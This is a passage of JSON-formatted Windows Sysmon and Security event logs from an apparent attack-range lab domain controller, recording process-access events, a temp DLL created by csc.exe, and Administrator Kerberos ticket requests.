{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5121,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5122,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5123,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5124,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5125,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5126,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-001000190800}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-001000190800}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5127,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:12.518\r\nProcessGuid: {41C8662E-20D0-5F25-0000-001073150800}\r\nProcessId: 4444\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\nga0qtan.dll\r\nCreationUtcTime: 2020-08-01 07:59:12.424","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:12.518","ProcessGuid":"{41C8662E-20D0-5F25-0000-001073150800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\nga0qtan.dll","CreationUtcTime":"2020-08-01 07:59:12.424","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5128,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.580\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.580","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220600,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220601,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{421D8777-8FDC-4BB3-5885-E64A7A79C360}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket 